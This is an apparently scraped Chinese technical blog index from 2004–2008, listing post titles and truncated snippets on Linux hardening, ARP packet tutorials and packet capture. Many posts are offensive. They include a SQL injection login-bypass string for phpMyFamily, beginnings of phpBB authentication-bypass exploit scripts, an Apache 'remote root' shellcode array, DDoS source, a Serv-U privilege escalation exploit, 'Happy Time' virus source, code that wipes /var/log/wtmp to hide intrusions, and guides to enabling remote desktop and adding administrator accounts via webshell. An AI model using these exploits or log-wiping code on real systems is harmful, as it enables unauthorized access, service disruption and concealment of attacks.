- 博客(42)
- 资源 (4)
- 收藏
- 关注
原创 Linux安全配置步骤简述
Linux安全配置步骤简述 一、磁盘分区 1、如果是新安装系统,对磁盘分区应考虑安全性: 1)根目录(/)、用户目录(/home)、临时目录(/tmp)和/var目录应分开到不同的磁盘分区; 2)以上各目录所在分区的磁盘空间大小应充分考虑,避免因某些原因造成分区空间用完而导致系统崩溃; 2、对于/tmp和/var目录所在分区,大多数情况下不需要有suid属性的程序,所以应为这些分区添加no
2008-03-31 20:13:00
755
原创 phpMyFamily <= 1.4.0 Admin Bypass SQL Injection
# Tested with version 1.2.5 /str0keLogin as admin without pass:Login: " OR a=a AND admin=Y/*" (without quotes)Password: (empty)
2005-03-27 10:37:00
1284
原创 phpBB <= 2.0.12 Change User Rights Authentication Bypass
#!/usr/bin/perl -w# phpBB <=2.0.12 session autologin exploit# This script uses the vulerability in autologinid variable # More: http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=267563## Jus
2005-03-27 10:36:00
1890
原创 phpBB <= 2.0.12 Change User Rights Authentication Bypass (c code)
/* Paisterists code was nice but heres mils version. * precompiled: http://www.milw0rm.com/sploits/897.rar * Usage: * bcc32 897.cpp * and place the exe in your firefox profile dir. * Usua
2005-03-27 10:35:00
1627
原创 IP地址精解
IP地址精解 [网络基础知识]==-IP地址精解-== 为什麽我们要学二进位哎呀还不是该死的蠢电脑嘛它只懂得0和1那麽我们要和电脑沟通的时候也只好装蠢一些才行。当电脑要处理IP运算的时候最终是以二进位的形式进行的。 我们人类最习惯的运算规则是十进位也就是从0到9为一圈回到零的时候就进一位数而我们前面讨论的bit和byte则是八进位即0到7为一圈回到零就进一位数另外还有十六进位由0到15为一
2004-11-30 00:57:00
1703
2
原创 linux指令大全(完整篇)(转自www.ChinaJavaWorld.com)
linux指令大全(完整篇)(转自www.ChinaJavaWorld.com) cat cd chmod chown cp cut 名称:cat 使用权限:所有使用者 使用方式:cat [-AbeEnstTuv] [--help] [--version] fileName 说明:把档案串连接后传到基本输出(萤幕或加 > fileName 到另一个档案) 参数: -n 或 --number
2004-11-30 00:56:00
1519
原创 Widnwos 2000 命令集合
Widnwos 2000 命令集合 accwiz.exe > Accessibility Wizard for walking you through setting up your machine for your mobility needs. 辅助工具向导 acsetups.exe > ACS setup DCOM server executable actmovie.ex
2004-11-30 00:51:00
1246
原创 创建SvcHost.exe调用的服务原理与实践
创建SvcHost.exe调用的服务原理与实践 1. 多个服务共享一个Svchost.exe进程利与弊 windows 系统服务分为独立进程和共享进程两种,在windows NT时只有服务器管理器SCM(Services.exe)有多个共享服务,随着系统内置服务的增加,在windows 2000中ms又把很多服务做成共享方式,由svchost.exe启动。windows 2000一般有
2004-11-30 00:46:00
1481
原创 网卡MAC地址相关信息大全(整理)(下)
如何实现修改网卡物理地址的三种方法同样要感谢胡大虾 1、买一块可以通过写eeprom物理的修改网卡地址,这种卡现在很多,并非买不到。如果环境中需要应用网络,那么修改MAC地址,使得两块卡的MAC地址不同,那么网络仍然可以工作。2、找一块ne2k或者eepro100的网卡,相信任何一个电子市场都有这两种网卡买,然后在ddk的sample里面找到它的驱动程序源代码,找到驱动
2004-11-30 00:43:00
1459
原创 网卡MAC地址相关信息大全(整理)(上)
网卡MAC地址相关信息大全(整理)(上) 首先要感谢jzyhummel(刀锋[篱影]) 兄弟提供的部分资料^_^ 网卡地址这个概念有点混淆不清。因为实际上有两个地址,mac地址和物理地址,一般说网卡地址我是指物理地址,不知道别人怎么看?物理地址指的是网卡上的存放地址的ROM里的地址,mac地址是这块卡工作的时候用的地址,一般情况下这两个地址是一样的,所以很多人都混用了,甚至不知道
2004-11-30 00:42:00
1606
原创 手把手教你玩转ARP包(一)【数据包的游戏系列之一】
手把手教你玩转ARP包(一)【数据包的游戏系列之一】 前 言 首先要感谢网络安全资深专家卢湖川博士以及VC网络版的limin朋友提供的资料以及帮助^_^经常看到论坛有人问起关于数据包的截获、分析等问题,幸好本人也对此略有所知,所以就想写一系列的文章来详细深入的探讨关于数据包的知识,,我希望通过这一系列的文章,能使得关于数据包的知识得以普及,所以这系列的每一篇文章我
2004-11-30 00:40:00
1867
原创 手把手教你玩转ARP包(完)【数据包的游戏系列之一】
手把手教你玩转ARP包(完)【数据包的游戏系列之一】 作者: 优快云 VC/MFC 网络编程 PiggyXP ^_^ 本篇目录: 四。ARP包的游戏 1 . 小伎俩 2. ARP欺骗的实现 3. 基于ARP欺骗的监听原理 四.ARP包的游戏既然我们可以自己来填充数据包,那
2004-11-30 00:39:00
1770
原创 手把手教你玩转ARP包(三)【数据包的游戏系列之一】
手把手教你玩转ARP包(三)【数据包的游戏系列之一】 作者:优快云 VC/MFC 网络编程 PiggyXP ^_^ 目录: 二。发送数据包的编程实现 1. 填充数据包 2. 发送数据包三。一些附加步骤及说明 1. 如果在VC中使用winpcap 2. 获得网卡信息列表 3. 获得系统ARP信息列表
2004-11-30 00:38:00
1503
原创 手把手教你玩转ARP包(二)【数据包的游戏系列之一】
作者: 优快云 VC/MFC 网络编程 PiggyXP ^_^ 目录: 一. 关于ARP协议的基础知识 3. ARP包的填充二。发送数据包的编程实现 1.填充数据包 .........................紧接上文............................ 3.ARP包的填充1) 请求
2004-11-30 00:37:00
975
原创 手把手教你捕获数据包(下)【数据包的游戏系列之二】
B. 打开相应网卡并设置为混杂模式: 在此之前肯定要有一段让用户选择网卡、并获得用户选择的网卡的名字的代码,既然上面已经可以获得所有网卡的名字了,这段代码就暂且略过了。 我们主要是要用到 pcap_open_live 函数,不过这个函数winpcap的开发小组已经建议用pcap_open 函数来代替,不过因为我的代码里面用的就是pcap_open_live,所以也不便于修改了,不过
2004-11-30 00:35:00
993
1
原创 手把手教你捕获数据包(上)【数据包的游戏系列之二】
手把手教你捕获数据包(上)【数据包的游戏系列之二】 前 言 经常看到论坛有人问起关于数据包的截获、分析等问题,幸好本人也对此略有所知,也写过很多的sniffer,所以就想写一系列的文章来详细深入的探讨关于数据包的知识。我希望通过这一系列的文章,能使得关于数据包的知识得以普及,所以这系列的每一篇文章我都会有由浅入深的解释、详细的分析、以及编码步骤,另外附上带有详细注释的源码
2004-11-30 00:33:00
1169
原创 Serv-U ftp server 密码算法
测试环境:SERV-U 4.1 & 5.0 & 5.004测试结果:测试通过测试方法:输入明文后点提交,而后将下面文本框中的散列复制下来,粘贴到Serv-U的ServUDaemon.ini文件中,而后重新启动Serv-u服务。即可测试密码是否正确。测试时发现,直接在INI文件中添加的账户,无须启动SERV-U即可登陆,但如果你同时添加了一些虚拟目录的话,虚拟目录需要服务器重起时才能生效。另外,如果
2004-11-27 00:51:00
1118
原创 Serv-u Ftp Server 本地权限提升漏洞的终极防御
Serv-u Ftp server(以下简称Serv-u)是一个应用比较广泛的Ftp Server,功能强大,使用方便,Serv-u>3.x版本存在本地权限提升漏洞,使用guest权限结合Exp可以以system权限运行程序,通过Webshell结合Exp提升权限已经成了很常用提升方法。漏洞简介: 漏洞是使用Serv-u本地默认管理端口,以默认管理员登陆新建域和用户来执行命令,Ser
2004-11-27 00:50:00
1275
原创 Linux内核文件offset指针敏感信息泄露漏洞
Linux内核文件offset指针敏感信息泄露漏洞 受影响系统: Linux kernel 2.6.7Linux kernel 2.6.6Linux kernel 2.6.5Linux kernel 2.6.4Linux kernel 2.6.3Linux kernel 2.6.2Linux kernel 2.6.1Linux kernel 2.6Linux kernel 2.4.9Linux
2004-11-24 00:43:00
789
原创 Apache/1.3.29 - Remote Root Exploit
Apache/1.3.29 - Remote Root Exploit unsigned char h3llc0de[]={ 0x23, 0x21, 0x2f, 0x75, 0x73, 0x72, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x70, 0x65, 0x72, 0x6c, 0x0a, 0x0a, 0x24, 0x63, 0x68, 0x61, 0x6e, 0x3d,
2004-11-24 00:42:00
954
原创 Samba 3.x SWAT预验证远程缓冲区溢出漏洞[代码]
Samba 3.x SWAT预验证远程缓冲区溢出漏洞[代码] 受影响系统 Samba 3.0.2 Samba 3.0.3 Samba 3.0.4详细描述SWAT是Samba Web管理工具。 Samba SWAT服务预验证存在缓冲区溢出问题,远程攻击者可以利用这个漏洞在系统上以SWAT进程权限执行任意指令。问题存在于sourc
2004-11-24 00:39:00
733
原创 DDOS程序源代码
DOS.c /******************** DOS.c *****************/ #include #include #include #include #include #include #include #include #include #define DESTPORT 80 /* 要攻击的端口(WEB) */ #define LOCALPORT 8
2004-11-24 00:38:00
856
原创 PHPnuke 6.x_exp and 5.x_exp
#!/usr/bin/php -qPHPnuke 6.x and 5.x fetch author hash by pokleyzz /*# PHPnuke 6.x and 5.x fetch author hash by pokleyzz # 27th December 2003 : 4:54 a.m## bug found by pokleyzz (11th December 2003 )
2004-11-24 00:33:00
857
原创 SERV-U本地溢出源代码
RhinoSoft Serv-U 5.1.0.0RhinoSoft Serv-U 5.0.0.9RhinoSoft Serv-U 5.0.0.4RhinoSoft Serv-U 5.0RhinoSoft Serv-U 4.1.0.3RhinoSoft Serv-U 4.1.0.11RhinoSoft Serv-U 4.0.0.4RhinoSoft Serv-U 4.0.0.0RhinoSoft
2004-11-24 00:30:00
1009
原创 shell基础九:awk
下面没有讲述a w k的全部特性,也不涉及a w k的深层次编程,仅讲述使用a w k执行行操作及怎样从文本文件和字符串中抽取信息。 引用:内容有: • 抽取域。 • 匹配正则表达式。 • 比较域。 • 向a w k传递参数。 • 基本的a w k行操作和脚本。a w k语言的最基本功能是在文件或字符串中基于指定规则浏览和抽取信息。a w k抽取信息后,才能进行其他文本操作
2004-11-23 17:19:00
923
原创 shell基础八:文本过滤工具(grep)
比方以 grep 来说, 在 Linux 上你可找到 grep, egrep, fgrep 这几个程序, 其差异大致如下: * grep: 传统的 grep 程序, 在没有参数的情况下, 只输出符合 RE 字符串之句子. 常见参数如下: -v: 逆反模示, 只输出"不含" RE 字符串之句子. -r: 递归模式, 可同时处理所有层级子目录里的文件. -q: 静默模式, 不输出任何结果(
2004-11-23 17:16:00
1114
原创 xp_cmdshell
日前SQL INJECTION的攻击测试愈演愈烈,很多大型的网站和论坛都相继被注入。这些网站一般使用的多为SQL SERVER数据库,正因为如此,很多人开始怀疑SQL SERVER的安全性。其实SQL SERVER 2000已经通过了美国政府的C2级安全认证-这是该行业所能拥有的最高认证级别,所以使用SQL SERVER还是相当的安全的。当然和ORCAL、DB2等还是有差距,但是SQL SERV
2004-11-23 13:45:00
901
原创 [分析]欢乐时光源码
啥都不说了。自己看,关于这个病毒在03年的时候大家应该被¥%……#·过。这是源代码.欢乐时光源码‘*************** 欢乐时光 *************** Rem I am sorry! happy time On Error Resume Next Mload ‘以上为病毒入口,并加上I am sorry! happy time的注释,以表明此文件已被感染过。 Sub
2004-11-16 22:16:00
1415
原创 防病毒禁写引导区程序
禁写引导区程序cureboot.asm编译成COM文件既可;cureboot.asm常驻内存,监视int 13H中断当程序对引导区进行写操作时,反回,达到保护的效果!编译方法!!! TC下编译 TASM CUREBOOT; TLINK/T CUREBOOT;使用方法:直接运行就保护好了磁盘,如果想解除保护,CUREBOOT/E代码:CODE SEGM
2004-11-09 22:10:00
828
2
原创 最新sql溢出源代码(概念版)
最新sql溢出源代码(概念版)#!/usr/bin/php// Nucleus CMS v3.01 addcoment/itemid SQL Injection Proof of Concept// By aCiDBiTS acidbits@hotmail.com 24-July-2004//// Nucleus CMS (http://nucl
2004-11-06 03:41:00
1483
原创 Tskill(结束进程)
结束进程命令Tskill(结束进程)tskill {processid | processname} [/server:servername] [/id:sessionid | /a] [/v]参数processid要结束的进程的 ID。processname要结束的进程的名称。可以使用通配符指定该参数。/server:servername指定包
2004-11-06 00:58:00
2441
原创 开3389的五种方法!
---------------------------------------------第一种方法:使用的工具:1:ipcscan扫描器2:终端服务连接工具xpts.exe(WIN 2000/XP 终端连接程序. 内附有COPY 文件的补丁. 格式 IP:Port )3:开终端的脚本rots.vbs(灰色轨迹zzzevazzz的作品)4:cscript (在system32文件夹下;98操作系统
2004-11-05 01:12:00
1371
1
原创 这几天有关网页木马的问题很多,现在介绍一个详细的使用过程:
---------------------------------------------一、建立用户--------------------------------------------------------------------1,在你的web目录下新建一个网页add.htm,代码如下This is a add user program!Its will add an administ
2004-11-05 01:10:00
1495
1
原创 洗脚走路的源代码
#include#include#include#include main(){ int fp;system("echo>/var/log/wtmp");if((fp=open("/var/log/wtmp",O_TRUNC,0))==-1){printf("Cleaned /var/log/wtmp.......BAD!/n/n");close(fp);} else{ printf("Clean
2004-11-05 01:07:00
802
2
原创 SQL Server口令密码对照表
SQL Server口令密码对照表 SQL Server在1433端口传输的数据大部分是明文的,这包括IP地址,连接用户名,成功和失败消息 这样一来,就很容易使用嗅探器嗅探在这个网段内SQL Server的相关信息,得到用户名和IP后,就 差口令了,其实SQL的口令加密是十分脆弱的,昨天我用了半小时,整理了一份口令字符对照表,在 分析SQL Server加密口令的时候,同时发现了SQL Serv
2004-11-05 01:05:00
864
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人